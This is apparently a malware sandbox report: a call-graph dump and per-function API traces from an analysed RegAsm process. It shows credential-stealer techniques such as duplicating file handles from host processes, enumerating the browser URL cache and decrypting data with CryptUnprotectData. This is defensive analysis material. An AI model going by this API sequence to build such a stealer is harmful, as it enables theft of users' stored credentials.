memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 
38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 
445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 
38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 
38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 
38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 
38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 
40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 
40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 
38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 
40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 
38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 
[Graph edge data (node ids, code addresses and API names) rendered as text; figure content not recoverable]

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph of function 40dd85 (basic-block address ranges 40dd85-40ddeb through 40e00c-40e01b with executed/not-executed edges), rendered as text; graph content not recoverable]

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                • API String ID: 2018390131-3398334509
                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                APIs
                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                • free.MSVCRT ref: 00418803
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                • String ID:
                                                • API String ID: 1355100292-0
                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
